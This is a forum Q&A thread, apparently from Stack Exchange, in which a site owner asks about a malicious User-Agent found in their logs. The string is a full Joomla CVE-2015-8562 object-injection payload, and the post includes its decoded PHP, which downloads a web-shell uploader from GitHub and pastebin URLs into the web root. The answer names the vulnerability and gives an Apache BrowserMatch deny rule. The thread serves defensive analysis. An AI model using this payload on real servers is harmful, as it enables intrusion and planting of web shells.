# What web servers are affected by this user agent exploit?

Tags: php, exploit, webserver

I found this user agent logged in one of my websites:

```
Array
(
    [IPaddress] => 115.89.123.121
    [userAgent] => }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:5070:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2siLCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtWjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdOMWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBzSUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJVOVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBkWEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pHbHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlkWE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFYUmxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı
[store] => 
)
```

And the decoded version:

```
<?php
function http_get($url)
{
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vuln.php";
$text  = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');
$open  = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if (file_exists($check)) {
    echo $check . "</br>";
} else
    echo "not exits";
echo "done .\n ";
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.php";
$text2  = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');
$open2  = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if (file_exists($check2)) {
    echo $check2 . "</br>";
} else
    echo "not exits2";
echo "done2 .\n ";

$check3 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm";
$text3  = http_get('https://pastebin.com/raw/880ufaWF');
$op3    = fopen($check3, 'w');
fwrite($op3, $text3);
fclose($op3);


$check6 = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.htm";
$text6  = http_get('https://pastebin.com/raw/880ufaWF');
$op6    = fopen($check6, 'w');
fwrite($op6, $text6);
fclose($op6);
?><?php
function http_get($url)
{
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/tmp/vuln.php";
$text  = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');
$open  = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if (file_exists($check)) {
    echo $check . "</br>";
} else
    echo "not exits";
echo "done .\n ";
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.php";
$text2  = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');
$open2  = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if (file_exists($check2)) {
    echo $check2 . "</br>";
} else
    echo "not exits2";
echo "done2 .\n ";

$check3 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm";
$text3  = http_get('https://pastebin.com/raw/880ufaWF');
$op3    = fopen($check3, 'w');
fwrite($op3, $text3);
fclose($op3);


$check6 = $_SERVER['DOCUMENT_ROOT'] . "/images/vuln.htm";
$text6  = http_get('https://pastebin.com/raw/880ufaWF');
$op6    = fopen($check6, 'w');
fwrite($op6, $text6);
fclose($op6);
?>
```

Has anyone encountered something like this? What webservers would be affected by this exploit? I'm running CentOS 7.4 w/ Apache 2.4.

Comment: Looks like that's https://github.com/04x/ICG-AutoExploiterBoT. But I can't tell from what you've sent if you've been successfully exploited or if this was just an attempted exploit. You can look around to see if the files from the GitHub repo are on your computer. If they are on the computer and accessible from the web, then you've likely been exploited. And it looks like it's not the webserver as much as the content management system.

Answer (score 4, accepted):

The user-agent beginning with `}__test|O:21:"` suggests this is an exploit against Joomla! [CVE-2015-8562](https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html). If this site didn't have old Joomla! 1.5.0 through 3.4.5 from before 2015-December-14, you shouldn't be affected.

The vulnerability is explained in detail on [Sucuri Blog](https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html).

Back then I had to temporarily protect my customers from this before they all updated their Joomla! installations. I created a server-wide solution for Apache to block these request using the `BrowserMatch` directive (in `conf.d/`):

```
BrowserMatch O:[0-9] joomla-exploit-workaround

Deny from env=joomla-exploit-workaround
```